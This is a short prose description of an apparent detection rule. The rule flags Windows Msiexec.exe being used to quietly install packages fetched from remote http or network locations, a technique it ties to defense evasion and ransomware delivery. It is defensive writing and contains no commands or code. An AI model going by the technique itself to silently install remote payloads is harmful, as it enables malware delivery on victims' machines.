This rule is designed to detect suspicious use of the Msiexec.exe process on Windows systems to quietly install packages sourced from remote locations. The Msiexec utility is a legitimate component of Windows used for installing Windows Installer packages; however, it can be exploited by malicious actors to perform installations without user interaction (quiet installs) using remote package hosts. This detection rule monitors process creation, specifically looking for calls to Msiexec.exe that meet particular criteria, indicating possible malicious activity. It performs checks on the command line used for process creation, searching for flags typical of installation commands combined with remote resource indicators (http, network paths). The rule triggers if all specified conditions related to image and command-line attributes are met, highlighting potential defense evasion tactics employed by an attacker. Its relevance is underscored by the growing incidents of ransomware and other malicious software being delivered via such methods, emphasizing the importance of monitoring for these activities.